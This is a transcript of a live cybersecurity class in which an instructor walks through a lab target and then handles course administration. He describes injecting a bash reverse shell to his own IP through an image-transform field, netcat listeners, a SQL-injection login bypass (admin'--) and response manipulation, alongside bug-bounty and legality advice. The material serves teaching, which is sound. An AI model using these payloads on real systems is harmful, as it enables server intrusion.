Good evening, all. I hope my voice is audible.
Yeah, good evening.
Yeah. So, as informed, sir, today is the last day. So, you are taking a session till 8:10. So,
Okay.
after 8:10, I'll be sharing the assessment link on the chat.
Okay. So they're going to write the exam on that link.
Yeah, yeah, correct.
Okay.
Okay. Yeah. Okay, sir, you can start.
Yeah. Just give me a minute. I'll share my screen.
Yeah, sure.
Yeah. Just please let me know if my screen is visible.
Yeah, yes, sir, it is visible.
Okay. Okay, so actually, last day we see that how we can able to gain the admin access by doing the hijack session hijacking with the help of cross-site scripting attack. And after getting into the admin page, we do some of the additional things like how to access the server details with the help of some endpoints. Okay, so we try for it's like a path traversal attack. So we do that path traversal attack to read the some of the text file inside the server. So the path traversal attack only we can use to read the files. We can't able to see what and all the files and directories are inside that server. Okay, so once we know some, I mean, files name, or else if we know some text file name, we can read that file. That's it. So we can't able to see what and all the other files are inside. Okay, for that, what we need to do, we need to understand the applications, and we need to understand what type of program language they are using. Based on that, we try to and I mean, there will be some default files. Default file in the sense for Python. If we yesterday we saw that that's a Python file. Okay, so first of all, I'll just log in with my virtual box. Okay, so yesterday we saw that that's a Python file. Okay, so in that Python file, I we know that okay, to run that web application in Python, we need the app.py, and we can able to read the environment file. We know the what is the default for that environment file. So we need to know this and all. Then only what we can do, we can able to properly search for that text file. Okay, so the once I know that, then what I can do, I can directly read that file. Okay, app.file. So by reading that app.file is the hard coded raw data, I mean raw code. Okay, so we need to understand the program, and if there is any flaws, or if you understand the code by that, if you face any of the different attacks, right? So we can perform that attack to get the server access. Okay, so in the same way, what I did, I just tried to read different files, and finally I found there is um, a particular endpoint to read the specific uh, data, and I found some of the admin credentials, and there is a, I mean, admin credential in the sense proper. I mean, I just logged in as a test at gmail.com. Okay, there is a one more user. We got that user credential, and we cracked that credential also with the help of crackstation.net. Okay, so now what we going to do? We're going to get this access of the server. Till now, what we did, we just tried to um, read some of the text file. That's it. Okay, so now what we try to do, that we try to take the complete access of the server. Then only we can read what are the other files are there. Okay, instead of just imagine and reading some of the text file, that will not complete things. Even that is also a critical vulnerable. Because I have the access to read some database file, I have the access to read the uh, program files, I have different access. Even though we need to try a bit more, because when we are giving that findings has a report writer. So we mentioned that okay, in impact part we say that with the help of I can able to read um, some of the database username password. With the help of that username password, the attacker may can able to take the access of the server. We just give that sentence as an impact. Okay, so instead of giving that sentence, we need to make that true. Okay, then only they feel that okay, the attacker can able to do that. Okay, so they, because of pen testing is that they are completely thinking from the attacker point. Okay, so what actually attacker can able to do, we need to try all the things here. Okay. Okay, so I'll check the IP of that. Forgot the IP. Okay, but actually here we need to do the same logic. Yesterday we did some of the logics, right, to get the um access of the admin account, right. So we need to, by using cross scripting, we need to do the hijacks. So what I'm going to do right now, I will just try to do it fast. I'm not going to explain that because yesterday itself I just explained what we did. So till there is a database credential, right, till that what I'm going to do, I'm going to run directly. Okay. I mean, session hijacking is not only the way to get the admin access. We have a different models to hijack the, to get the admin access. Okay, so we need to, here we just use the cross-site scripting to get that, and there is some other way like we can able to manipulate the request or manipulate the response to get the admin access privileges. Okay. So request and response in the sense, so when you are requesting for the login, right? So to log in as a user account, so there may be a chance of sending some uh, what to say, to understand from the server side. So from browser it will send some of the details, okay, admin equal to false, or else there is a chance of in response what and all the functionality permission can be eligible for this user. So that details will be in the request and response. Okay, if we do changes on that, right, so instead of admin equal to false, if I make it true, I will get the admin access directly, because in request it's saying that admin equal to false, it means it's a login as a normal user. If in response, if I get to know that okay, so what and all the field can be accessed by the user, that field name can be displayed there. Okay, so if I do edit on that particular field, or else if I add something new, what field, right, then automatically that will pop up on the browser, and I can able to access that field as well. It's like a request and response manipulations. Through the request and response manipulation also we can able to perform this attack. Okay. I don't know yesterday what actual password I got there. Let's see. I'll try to get that password. So yesterday the password, last we got the password. Okay. So the password will be I'm Batman. So this is the actual password, because yesterday we got some hash value. We decrypt that hash value. We got this as a password. Okay. So now what we're going to do? Now I'm going to log in as this user. Okay, because we see that there is a admin test user is one of the admin. There is one more user called abnormal admin. Actually already we are as in the admin only. Okay, so now we have one more user, right? So admin and test. Now I'm going to log in as a test user, and I'm going to try is there any other attacks can be possible. Okay, so what I'm going to do now, so I'll just copy this and paste it in the notepad for my future reference. Okay, so now I'll log in as that 10.129.16.243, and we know that there's a port number ran. Oh, sorry. 110.129.16.243, and the web application will run in the port 8000. So yeah, so now we just got the uh, homepage. So I'll log in as a test user now. Okay, test user at the rate of, but actually test user I just used as a gmail.com. Okay, so here I just used as a Gmail, but actually that is not a user in the server side. I mean, they already created some users and they have some credential, right? So that user email ID will be test user at the rate of .htb. The same users we got yesterday. Okay, so for this user, this is the credential. Okay, just copy. I am pasting here. Okay, see now it's logged in successfully. Okay, so if you see something, I mean, there's a different. Okay, so if you log in as a normal user, you don't have a options like, I think we don't have this manage group options. Okay, when I logged in as their user, so I have a access functionality called manage group, and have a file upload functionality. So let's see, because once I upload the file, so it will come here only, because here they are mentioning that uploading file will add some pages here. Okay, it means once I upload, I'll got the data here. I mean, what data I have upload, I can see here. Okay, so now what I am going to do, so just click on upload. Okay, I'm just going to do some something like I'll yesterday I downloaded something here. Okay, I'll take this image. Okay, so then I'll just give the title testing, and I'll see description or testing user. Okay, so the way what I'm doing, right? I'm trying to understand the application. After that, only I'm doing the all the activities. Okay, so before without understanding, I will got some confusion. Okay, I don't have the what to say. I can't able to properly do the attacks. Okay, so I know that once I do the upload, I'll get something here. So I just try to correlate from the starting to till now. Okay, so first I just logged in as a normal user, then I just logged in as admin user. Then now I am trying to log in as a there's one more user from the direct target. So I'm trying to log in as that particular user now. Okay, so for the both three user, there are different functionalities. One is like what to say. So in as a normal user, I can't able to see anything here. Okay, so even if I upload, I can't see here. So in admin user also we face. I mean, I can see, but the problem is like there are few functionalities not viewable. There is a hidden functionalities. Okay, so then I just logged in as admin. From that admin, I have different additional modules. I try that. So now I have a logged in as from their user. Okay, so now we see once upload what will happen. Okay, testing, testing. Even if you see the same function same functionality for the different user, we need to even though we need to try that, because first user maybe there is a different option, second user there may be a different feature, third user there may be a different user. So we need to understand the roles also here. Okay, based on the roles, the functionality will get different. Okay, so here we need to understand the roles. Okay, so I'll try to upload this image. Okay, so it's got uploaded successfully and I can see something here. Okay, so now see here you have an options called edit details, convert format, transform image, delete meta details. Some things are there. Okay, so if I click something, I can able to do that. I can able to okay, so if I want to crop, I can crop and I can apply transform here. Okay, so and I can able to download the transformed image here. Okay, so fine. So now what I am going to do now, okay, so I am going to intercept this particular field. Okay, so once I click on the transform image, okay, so I'll go to settings. Okay, here what I'm doing, proxy settings, manual proxy configurations. Okay, image. Okay, so now I'm going to intercept this particular things. Okay, I'll just click on crop, and what I'm doing going to do now, I'll just click on apply transforms. Okay, so anyhow we see some of the details here. Okay, so in X there is some details, Y there is some details. Okay, so actually what I'm going to do now here in the Y field, okay, so I'm going to write some of the reversal script. Okay, so in notes I have mentioned all different types of reversal script. Okay, so you can use that reversal script here. Okay, so here what I'm going to do, I'm going to write the bash shell bash type of bash script. Okay, bash script, you help me to get the access of this target server. Even you can ask me that why I'm specifically using the bash script instead of we have a Python, we have PHP, we have different language. You can ask me why specifically I'm using the bash script here. The reason is because my backend is a Linux. Sure, Linux will accept the bash shell script. Okay, so that's why I'm trying to write the bash shell script. Okay, so if you want to send it to repeater to analyze the entire things, you can send and you can do the analysis. Okay, so if you see here, if I remove some value here, okay, okay, where is that? Sorry. So see here, if there is a some data is missed, if some data will miswrite, you will get the 400 error. Okay, so if I see here, if I remove this zero, so if I send the data, you can see there's a 400 request. Okay, so once all the data are there, then I can able to get the success request here. Okay, even you can see that properly where that actual file is getting uploaded. Okay, you can see the path where it's actually getting uploaded. Okay, so in penetration testing, the path should not revealed. Okay, because if you see here, once I do the upload, the file will properly upload it in the folder name called uploads. Inside that there is a name called admin, there is a name called transfer. Inside that there is a image file. Okay, properly it's storing there. Okay, it means it's there is a path to store the data. Okay, so it's taking this image id crop. Okay, so params values everything. Okay, now what I'm going to do here, so instead of this value, I'm going to write the script. Okay, some bash shell script. Okay, so before that, what I'm going to do, I'm going to run some of the monitoring service here. Okay, so why I'm trying to run monitoring service? Okay, so the reason why I'm running some monitoring service is because if that script got executed, right, anyhow that script will send some data to some system. So that system maybe should be attacker system. So here my system is the attacker system. So that's why I'm creating a place to see the records. What on all the data is coming from the target, right? I need a place to monitor that. Okay, so that's why I'm creating the monitoring here. LNVP, and I will create some port called 4243 Okay, you can use any port number here. Okay, so in script, what I am going to do, I will write a script called zero. Anyhow, zero is the common thing. Okay, so after zero, what I am going to do, so slash uh, bin slash bash space hyphen c slash bin slash bash space hyphen I slash dev slash tcp slash. So here what I'm going to do, I will use my system IP. Okay, because once this exists script got executed, right, this script should send the system connectivity to my system IP. Okay, so that's why I just created monitoring here. Once I receive the data, I'll get the data in this particular place. Okay, so my IP will be 10.10.17.207. Okay, so this is my actual thing, and 4343. Okay, so then I'm giving 0. Okay, this is the actual script. Okay, so once this script got executed on the server side properly, sure, I will get a access of the target. Okay, anyhow, I'll just copy this. I'll keep it for my uh, reference, because if there is a error, or if I'm face something right, I don't want to write the script again, I'll just copy paste from here. So easily I can do that. So that's why. So anyway, I'll just see the response for this request. So just forward. Okay. So I forwarded the request here. So let's see what happened. Okay. So I'll do once again because I don't see any changes here. Okay. So because of this things only, I just keep take it for my reference. Uh, okay. So I'll take from here to till here. Okay. Just copy. Yeah. So I just paste it here, and I can see the response for this request. We Okay, let's do one thing. If I'll try without intercepting the brubshoot first, whether it's properly getting I mean, there is any change, I can able to do the transformations or not. So I'll just click on this. Okay, now it's properly working. Okay, so then I'll just keep this. Already have taken the request to the what to say, to repeater. So using repeaters also, I can able to reiterate that attack once again and again and again. Okay, so because you can ask me how this can be happen, because already have the session value of that particular user. So with the help of this session ID, I can directly do the changes here. So if you see here, if I how many I'm doing so much of times, right? So for that much of time, you can see the transformations here. Okay, so let's see. Uh, I don't know why it's taking a time. Maybe it's for execution is taking time. So 10.10.17.207. So bash script, everything's all fine there. I mean, sometimes when you try for the reversal, right, we need to wait for a time. There is a chance sometimes we'll get an error. We need to try again and again. I know we need to get the access now. Uh, I'll do one thing now. I'll just try to send the one more request here. Okay, I'll just use the different port number, maybe. So I'll take here sudo su kali nc space hyphen lnvp 2222. So I can't use the same port number for us one more request, because already there is a 4343 waiting for the some other request. So now I am trying to take one more access from the target server in the port 2222. Okay, so I'll send the request for this as well. Let's see for which one we are getting the proper response. Slash bin slash bash zeros. Just I'll just recheck that. Slash bin slash again bash hyphen I greater than symbol slash space dev slash tcp 10.10.17.207. Okay, 222. Okay, I'll just do one thing. I'll just check the script once again. Okay, because maybe there is a problem with the script. Okay, there is no image in that name now. Okay, I think again I need to upload that image. Fine. So I'll do upload once again. Okay, testing demo my image. First I will upload this. So after upload, so I have options to transfer image here. Okay, so click on transfer image. While before uploading applying transformations. Okay, so I'll just select crop here. Okay, so then I will do apply transformation here. So now I have the, okay, so I'll use 222 here again. Don't know why it's taking time for access. Why it's not coming? The image not found. Okay, there's a issue with the image. Send to repeater. Notes today you all will get the notes. I already prepared, and after this class I will share the notes with Shushmita, and you will get that. So maybe there's a issue with my script. I'll check my script once again. There are some sites for to get these types of scripts. Okay, for that mostly you will get some from GitHub links. Okay, there are so much of GitHub links for the bash shell reverse shell script. So if you type that, you will get that actual script. Actually, this is only the way we can able to get the uh, access. Okay, I'll remove this and I'll try once again. So now what I did, I just remove the 0 here. Okay, now I'm trying to upload that. Okay, Mhm. I think there is a error. Okay, I need to give one more double quotation here. Okay, I'll just restart the system once again. Maybe because of that, it's taking time. I'll just restart the system. Actually, so when you we need whenever we are learning something about cybersecurity, right? Just don't see only in the way like okay, uh, if you read some blogs, for example, you are reading some blogs, okay, so you see there are some attacks, and we are just seeing only what tools we can able to use and what actually we can do. That's it. Okay, so whenever you are reading for some of the particular exploit, right, we need to understand from the back end. Okay, so once you understand from the back end, right, because if you understand the basic concept of that particular exploit, so mostly when you are reading for the second but blogs say different exploit, so the base concept will be the same. Okay, there is a few new additional methods will be there. That's it. So you need to understand the basic first. So once you understand the basics, easily you can able to understand the higher level. So once you strong in the basic, right, you will not forget anything. Even if you forgot, you know how to get that back and how you can able to search that. Everything you will get an idea. So this is only the way easily you can able to learn that. Basic in the sense of okay for okay, so here we are doing some exploit, right? Here I am doing exploit and show extra. Yesterday I show you how to take the session value of using cross-site scripting. Everything I show you that. Okay, so you need to understand in which law, I mean how, and I understand the logic and why specifically I'm using this particular script. Why specifically I just try with this particular field, because see, if you have a different field right here, so edit details are there, convert format is there. Why I'm not able to use this? See, if I use this particular functionality, okay, if you see here, if I use this functionality here, okay, convert. So that's it. Simply it's converting. Okay, I don't have a place. Even if you see the response of this, okay, so you will not see any specific path where it's loading. Nothing. Okay, so when I try with this particular transformation. Transform image, right, so I can see the path there, so that I am using, and I have a place to write my own script. Okay, so we need to understand this basics, but you will get a script from a GitHub link and you can able to use that same script for anywhere. But you should know that where you can use the script and where what changes you need to do with that script. Okay, script will be the same. Script will be the same for all the different attacks, so you should don't want to worry about the script. Okay, but you need to understand where you can use the script. Okay, so you need to understand what if the server is responding in this way, right? So see here, I just send the request here, so I just get only the empty here. Okay, so if I send the request here, you see that there is a response call file, the image file is not there. So for each and everything I'm getting different request here. Okay, based on the request, we need to understand what actually a server is trying to say for my request differ. I mean, because I did changes on the request, right? For my request manipulation, what the response is service trying to say. If we see here, I already sent the request here, I'm not getting anything here, so it's a blank, right? So it means that the server is not responding properly for my script. There is a chance of this session value may be expired, or there is a chance of this image id may be not there. Okay, there is some reason, that's why I'm getting the empty value here. Okay, if I go with this, see, I'm trying for the different request. Maybe see if after I'll close turn off the intercept, I'll load it normally. Okay, sorry. So if I load this normally, let's see what happened. See, unable to connect. This is the actual reason here, because now the IP got changed. This is the actual IP because I restored the system, right? So once I restored this is the actual IP. But see here, if you see that IP of this target, it's completely different. That's why I'm getting the empty response here. Okay. So based on the response, we need to understand what actually the target is trying to say. Okay, this is the basic thing. And what is the actual test? I think test user at the rate of mrg dot I don't know the actual HTB, and password will be I am Batman. I think this is the actual password. Yeah, get logged in. So here I just want to try again with a uh new file upload. Okay, so downloads the image, just giving something and giving something here, and I'll upload because already I got the access. Let's see. Okay, now I'll turn on the intercept. So okay, apply transformations. You see there are okay. So here I'm just going to add this one. Just copy 4343. I'm going to use the same port number 4343. So yeah, you see that there are two things. So two requests. In one request, I'm using 4343, and another one request I'm trying to use 2222. Okay, well, let's see whether so if you got some response right. We'll try with both the things. Send to repeater. Okay, I'll just keep this one is for safe. 10.17.207. I don't know why it's taking time to response back. Okay, fine. So we'll wait. We don't want to wait, and we'll work on the different concept as well, same time. Meanwhile, so once we got the access, then we'll see what we can do because I don't know why it's taking time to response back. So I'll try last one try. So apply transformations. Okay, image transformation fail. Only on this particular area, I'm not getting any errors. Easily, I can able to do the changes on this. Even there is no error on the script, but I don't know why it's during the image transformations. Okay, there is no transformation happen. That's why. So once the transformation happens successfully, right? So then sure I will got the access. Transformation crop. So I don't know why it's after adding. I'm not able to do anything. Let's see. First, I'll ping the server. Anyhow, it's working fine. I'll check my IP. Fconfig 10.17.207. So 10.10.17.207. So 10.10.17.207 slash 4343. That's everything not properly there. An error occur during the transformation. Okay. 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 Last one time. Okay. I'll do some changes here. Because sometimes this will happen because we know that that is the actual endpoint. Even if we try for the different script, right, we will get some error. So we need to check and we need to rectify that. So for that, anyhow, we need a few time. Okay, so I'll try with. So I'll just increase the size maybe I need to do some changes, maybe the weightage and height. If I do some changes, there may be some, because I'm using with the same request, right? 920 to 43. Send to repeater. Let's see whether I'm getting some response for this at least. Okay, there is some response. Okay, fine. No issue. It's taking a time to execute on the target. Maybe there is some script error. Meanwhile, I'll show you that one more thing, how we can able to bypass the um, I mean authentication with the different methods. Okay, so actually, we saw that how using session hijacking. Okay, so there is a one more concept. I will try with this website. Okay, so so we go with this particular site. Okay, so here if you want to bypass, we have a different methods. Okay, so different method in because anyhow we need to wait for a time, because I don't know actually what happening in the back end, so it's taking time, or else I need to restore the system 2 or 3 times. Maybe there are a few different user maybe trying to attack the target in the same port. Maybe that's a reason I'm not able to execute that. Okay, so actually this is the way to get the access of the server. Okay, so if there is a user, there are some users, maybe a chance of trying more than my with the same more users in the same port number. Okay, that's why I don't want to waste the time here. I just want to show you one more thing, like how to bypass the authentication in the different way. One is like SQL injection. We can able to bypass the authentication. There is a chance of request response manipulations. Response manipulation in the sense, simple things. So when you are trying for the success login, right? So first, what I'm doing, I'm just trying with the success login here. Okay, so I know this is the actual success login. Okay, so what I will do, I'll take this response here. Okay. So I'll just do the intercept, or else I will send it to the repeater and I will see what is the actual success response for this. Okay, this is the success response. Okay. So now what I'm going to do, okay, so now here I'll just drop the traffic. Okay. So I'll log out from this account. Okay, so I'll log in. So what I'm going to do now, I'll just take admin and I'll give some random password. I know this is not a correct password. Even if I try to log in this, so it will show me the some error. There is a sorry, the past user and password are not found on the system. Okay, so actually what I'm doing here, I'll just try to give some random password. Okay, so I'll intercept with the troubleshoot here. Okay, so once I do the intercept, okay, so I'll see the response for this. Okay, so before doing the authentication bypass, we need the success response. Okay, so you can ask me that, okay, if there are some sites without direct law. I mean, I don't have I mean, I'm not a user of that particular applications or that particular target. So even how we can try with the success login, in that time we can't able to try with the manipulation. So we need to go with the SQL injection, because if you want to try with the server response manipulations, sure, you need success response. Okay, for that at least you need some um, normal user account in that particular applications. Okay, so now I'll just do the response and I'll see. Sure, I know that this is not a proper response, so I'll get something here. Okay, so what I'm doing going to do now, I'll just use the same response. Okay, just copy this response, success response. I'm going to replace here. Okay, so once I forward it, so let's see what happened. So even if you got something like this, then fine, this is a properly safe. If it is get logged into the applications, then it's a vulnerable. Okay, so even how this is actually the I mean, how the applications are understanding whether this is a proper response or not with the help of this session value here. Okay, because this session value is like we can say that session value will help to identify the users. Okay, so and this will if this will have some additional detail like whether the user is still logged in or get logged out, or else in this particular system whether the system is already logged in. Maybe if you take the details, I mean if you take different application like banking, sorry, Gmail, Facebook, if you open in your friend system, that time it will ask a username password. If you open in your system, again it will ask the username password. So it will check the session IDs. Okay, so if you're trying to log in from the different system, the cookie will help to understand whether this is logged in the system or logged out. So what is the actual scenario. Okay, so that's why once I replace with this particular response, what happened here, this response properly saying that I already get logged out. Okay, so we can't able to use this cookie to logged in again. If it is accept to logged in, then that's a vulnerable. Okay, so easily you can able to get into inside the applications. Okay, so this is the one of the way. So then there is a SQL injection part. So if you see here, so admin, so I'll try with the SQL injection apostrophe. So I'll give some random password. Okay, I'll try to log in here. Okay, so anyhow, see here we are getting some error. So initial error and different the next, I mean initially when I try with the wrong username password. Okay, so I'm getting something different error pop-up message here. We sorry, but the username and password was not found on our system. Please try again. Okay, this is a common error. So if you try with the wrong username and password. Okay, so if I try with the admin apostrophe, even the password is wrong. Okay, see the response will be the error message will be different. So syntax error. So first is the normal error message, second one is the syntax error. So announced the details whatever I'm giving here, the password at line 1 column 67. It means it's the error is getting from the applications. I know from back end of the application, from the database we are getting the error. Okay, so when I try to use this apostrophe, right, what happening actually in the backend? So if I use the apostrophe in backend, it's breaking the database. So because of that, I'm getting this error. Okay, so if I have a chance to uh, join the database, okay, so apostrophe, I'm giving hyphen hyphen. This will help me to join the database once break, and then it will join. So I'm giving some random password here. Let's see. See, I got a successful logged in successfully. Okay. So this is a type of SQL injection. So in SQL injection, we have a different methods. So okay, this is the one of the method. So SQL injection will help to dump the complete database. Sometimes you will get a chance to get the server access also with the help of that SQL injections. Okay. So for that you can use the tool called SQL map. Sometimes the SQL map will get some error. So the you need, I mean if there is a WAF or something, you need to try with some different script to bypass the WAF. Okay, because when if there is a WAF, sure the WAF can understand. If I try with this script, right, so WAF can understand, okay, there is a attacker trying for some malicious activity, so it will block that request. Okay, or else there is a chance of response like normal error. You will not get this error message. Okay, that time we need to try with different one. Okay, instead of single apostrophe, I'm doing with double one. Okay, so see, if I with the work with the double apostrophe, it's getting different error. So admin, I will use the semicolon here. Okay, so if I give it this, So even I'm getting the different normal error message. So once I give this single apostrophe, so I'll get the proper error message from the database side. Okay, so because I mean actually it can happen even there is a no WAF. Even if I mean whether if I try with a different instead of single, if I try with double quotation, semicolon, or else slash value. Okay, so how the application saying that it's this is showing me the normal error message, because in when you are doing some login right up, so this login detail taken by this backend code, and it's sending to the database. Okay, so in the backend code, how the actual data is taking, right, based on that we are getting the error. Okay, so if that backend application taking our username credential, right, if I give this single apostrophe, so in that backend code when it's taking as a syntax, okay, anyhow we use the single apostrophe or double apostrophe there. So if I use the single quotation, so what happening, it's breaking the entire uh, script, I mean entire code, and we are getting the error from that application database. Okay, so how that developer try to get the request for our user login details, right, based on that also there's a difference. See, if you use the same logic for the Gmail or for that, it will not work. Okay, because if you can try, and you can report them. If you can able to possible that, you can report to the Google, and they will give some boundaries. That's a different thing. Okay, but actually will not get there, because before they're launching here, even they have a own team to do this. Okay, this and all the basic script, whatever the script I am trying here, this and all the basic one. Okay, so this basic script, sure, they even their security team also know that. Okay, they will prevent everything. Okay, if you want to try, you need to try something different from here, you need to understand the code level, then you can able to do that. Okay, because if you try with some other top level of sites, right, so sure they have a security team. So if you because we are what we are doing, we try with the different of sites, and we see that okay, why it's not getting the proper response we are getting in the demo session. So why we are not getting for from our side, because that particular top site and all, they have a own security team. Every month they will do the security test, and they will do the security test from the external team as well. So you there do there they will focus more on the security side. Okay, even if there is a small low vulnerable also, sometimes they will fix that. Okay, so they know that that small vulnerable can be, there is a chance of critical vulnerable in the future, so they will fix that issue. So they will leave that vulnerable which is not going to affect their entire systems or entire business. They will not fix that. So if you there's a chance of, okay, if you see sometimes you will see that. So in okay, so see here, so you have a see, there is a the site is not working in the HTTP here. I mean HTTPS. It's working in the HTTP. Okay. So sometimes what happen? So if you try with the different small modules, right, so it will work in the HTTP. When you directly go on the login page, so that from that time onwards it will work in the HTTPS, some of the applications. So if you say that, sir, your application is not secure because you are it's running in the HTTPS, they know that. They will try focus only on the after login, because after login there is a sensitive part. Okay, so once they come to the login page, from here they need to run the application in the HTTPS. So based on that, they will do that. Okay, so you can't try in the top level of sites. If you want try, it can try. You need to do some different, you need to try to bypass that login page with a different script. Okay, so there's a different chance. See, if you do that, I mean, once you do this, right, you need to report them. Okay, if you take the data and if you're doing something different, or if you're doing the something wrong way, that's illegal. So actually, that's why there is a concept called bug bounty. Okay, so you just open login in the Buckroad or Hacker One. There you see so much of sites are there. So from that, you what you can do, you can able to do the research, and you can, if you find some vulnerable, you can directly show that, you can report them. They will provide you the bounties. Okay, you should not do any illegal activity there. Okay, if you can do something, you need to inform them, sir, I can able to this. You need to explain properly. First, you need to mention what is the attack name. For example, yesterday we do some cross scripting to hijack the session, right? I'll mention session hijacking via cross scripting. I'll mention that name. Then I will properly explain the description, the application, what application is happening with the help of that, I mean with the cross scripting, and what actual impact is that. With the help of cross scripting, the attacker can able to take the session id, and they can able to log in as an admin user. And okay, so once they logged in as admin user, there is a chance of reading some sensitive data inside the servers with the help of some endpoints. So that I will mention it as an impact. Then second thing, I will mention properly how to remediate this. Okay, so I will properly mention the remediation. Then I will mention the severity. So I will mention the severity as high, because I'm a normal user. With the help of that cross scripting, I can able to hijack, and I can get the access of the admin. So it means it's a high level vulnerable. Okay, I will mention the so I will mention the severity, and I will properly mention the um, remediation. Then I will just make paste the screenshot how I did. I'll make paste the screenshot step by step. Then I will report them. So this the things we need to do that. Okay, so we should not do something different or something bad. Okay, so actually the pen testing is like, we need to we trying to learn, and we try to inform the organization to make their environment safe. Okay, yeah, I think let's see, we got access. Okay, so anyhow we are not getting the access, fine. So from your end you can try the this one. Okay, so let's see if you got fine, because I'm not getting anything. See, the image not found on the unauthorized to the transformation. Okay, fine. So after sometimes what happening, it's automatically getting removed. So if you can able to log in, I mean, if you try with this, you can try and see whether you are getting the access. Once you got the access, here you see the connected, and you have options to type the commands, whatever the commands you are typing, that command will execute it on the target system, and you will get the access or response for your command. Okay, so fine. So that's it. I think if you guys have any doubts, just ask me. I'll try to explain. Okay. I think okay. I hope nobody have the doubts. Okay, go down. See, just checking is not a problem. See, actually, when it's considered as illegal, if you do something, then it's illegal. So you, if you're not found any vulnerable, that then it's good, right? So that's not an issue. I mean, whenever you are taking a site, just try, see whether they have uploaded in the bug bounty or somewhere. So you just take that site and try with that. And even if it is if you not found any vulnerable, not a problem. Okay, that's not illegal. If you do something illegal, then it's a problem. Okay. So I hope everyone are clear. If you guys have any doubts, or you can drop me a message in chat. I'll just read and I'll explain. I hope everyone are clear on the topics. So till day 1 to day 15, till now, whatever we see. Okay. Anyhow, this will help you in your uh, what to say, in your interview as well. Okay. So let's see. Hello, Shushmita, can you hear me?
Yeah, yes, sir.
Yeah. So I think we complete the today class, and nobody have the doubts. So we can,
Okay.
I think, go with the assessment test.
Yeah, yeah, sure, sir. Thank you so much, sir, for all this 15 days of wonderful classes. I hope this has been helpful for our students. We'll definitely be in touch with you, sir, for next SDP or FDP. Thank you so much for your 15 days of valuable time. So, thank you, sir.
Yeah, thank you.
Okay, so students, as you all know, today is the 15th day of this particular session. So, we are conducting the assessment. This assessment is just for the knowledge purpose, and it will be like MCQ question for 50 marks. Sir, anything you wanted to address? Can I share the assessment link?
Yeah, you can share the assessment link, no issue.
Yeah, yeah. Okay, sir. Thank you.
Yeah, thank you.
Yeah, so students, I'll be sharing the assessment link on a chat, both YouTube and Zoom. So I request please read out the questions carefully and start taking it. Whatever has been taught in 15 days, the same questions are there. It is a MCQ questions. Okay, I'll be posting it. Please allow me 2 minutes. And one more request. It is like this assessment will be till 8:45. Okay, till that I request not to ask for attendance link. After completion of this assessment only, I'll be sharing the assessment, I mean, sorry, attendance link, and also I'll be giving some important updates. So after the assessment, I'll let you know. So I request in the between not to ask for the attendance link. Okay. Yes, the assessment link has been posted on chat. As I informed, kindly read out the questions carefully and start taking it. The assessment link will be active only till 8:45. So before that, you have to submit it. I hope you all doing with the assessment or you all completed the assessment. Let's wait for 10 to 5, like 5 to 10 minutes. Then we can just stop the assessment. I request please, once you are complete with the assessment, not to drop the session. Wait for it. As I told, we have to give important updates and also you have to mark your attendance. So don't leave the session. Stay online. So yeah, till 8:45. Let's the people are taking still. So we'll wait till 8:45. Okay. Okay, I think you all completed the assessment. If you're done with the assessment, kindly mention in a chat that you have done with an assessment. And attendance link, I know, please, as I told, wait for some times. I'll be sharing it. Okay, I hope you all completed the assessment. As I already informed that assessment link will be active only till 8:45. 8:45 automatically the attendance, the assessment link will be deactivated. Again, you can't take any assessment as which is already informed. Okay, fine. So right now I'll be sharing one GMB review link. GMB review link in the sense you have to give the review. So whatever the 5 days, the 15 days which you have attended the STP on cyber security, we just wanted to know how the session was helpful, and we just wanted to know the your feedbacks. Okay, I'll be sharing the GMB review link. This is very important. Kindly click on the link and start giving the review, like mention any one or two sentences like how was the session and how was the trainer, how the session was helpful for you all. Okay, there are the links which is based on your location. It's if you're from Bangalore, click on first link, and if you're from AP and Telangana, you click on second link, and if you're from Mumbai, you can just click on the third link. As the same, there are the links mentioning the location. So I request your for which place you are belonging to, click on to that link and give the review. As a part of this program, this giving a GMB review link is all GMB review is also important. Let me wait for 2 to 3 minutes. I request start giving the review. And one more thing, please don't mention it as free. Whatever which was helpful for you, you can just give it like in a 2 or 3 sentences, but don't mention it as a free. Yeah, the link is has been shared again on chat as informed. Kindly not to mention it as a free. Just give a review. Like we just wanted to know in a few words. Okay, fine. I hope you all gave the review. Thank you so much. If not given, I request please give the review. Okay. So yeah, right now I'll be sharing the attendance link. You all can mark your attendance. I know you all eagerly waiting for attendance link. Definitely, I'll be sharing it. You can mark. And one more thing, as today is the last day for this particular program, so we are starting a new program from Monday. That is from up next Monday, that is on 9th of February. So if you are interested, even you can join for that particular program. It is also a same student development program from 7 p.m. to 9 p.m. for a free. If you really wanted to join our upcoming classes as the same, please go to XLR website, that is www.xlr.com, where you can see the registration link. Click on the registration link and join for like register for the particular program and join the classes. As this courses which you are completing will definitely help for your career and also in your resume. Okay, you can update in your resume that you all participated in such programs. Okay, so yeah, I'll be sharing the attendance link. You all can mark your attendance. And I know the people are asking about the certificates. See, the certificate for definitely you will all get, if you secure 60% of attendance, then you will all get the certificate. So 60% of attendance is mandatory to get the certificate. If you are not eligible, like if you have not secured above 60%, then you will not get the certificate. And if you are eligible, you will get the certificate for your register mail ID. So to issue the certificate, we at least required 10 to 15 days. So you have to wait that's what, within 10 to 15 days, if you are eligible, we will issue the certificate for your register mail ID. Ma'am, I could not join the early today. My test I submitted it showing. Actually, the test link which is already closed at 8:45. So the test link has been shared on 8:10. So if you have joined after 1 hour, it is I'm not like I'm helpless. So yeah, the timings was the session timing was 7 o'clock, but you have joined after 8:30. It doesn't sense. Yeah, the next SDP is based on the DSA, that is uh, day, like DSA product based companies. Whatever the program which is there, it is reflecting in the registration link. Kindly go through there. If you're interested, you can just mark. Ma'am, I did not submitted the answer. That's what, as this assessment will be uh, not affect your certificate. No need to worry. This assessment which we have conducted only for your knowledge purposes. Due to some technical issue, I'm using the other mail. It's my college mail. So yeah, that's okay. No issues. No problem with your mail ID, whichever you use. What about the notes? Yeah, the notes, I mean the materials and the recordings, which is uploaded in LMS dashboard. You can go through it whenever you require. You can view the recordings and also the materials. Okay, any other questions or concern? I'll just repeat. The certificate we will issue within 10 to 15 days. So for your register mail ID, if you're eligible. Hi, ma'am. My friend attendance 6 days absent, ma'am. Please send. See, the attendance link can't be shared. The previous day's attendance link can't be shared. You have to attend the live session, and from live only you have to mark your attendance. The previous day's attendance link can't be shared. I'm sorry. How to download the certificate? As I told, there is no any options to download the certificate. You will get the certificate for your register mail ID. No, there is no problem if you have not attended the assessment. No problem for the certificate. If you're secure 60% of attendance, for definitely you will all get it. Yeah, the material still not yet uploaded in LMS, which I'm going to take it from a trainer, and by tomorrow I'll be uploading all the materials where you can go through. When we get the 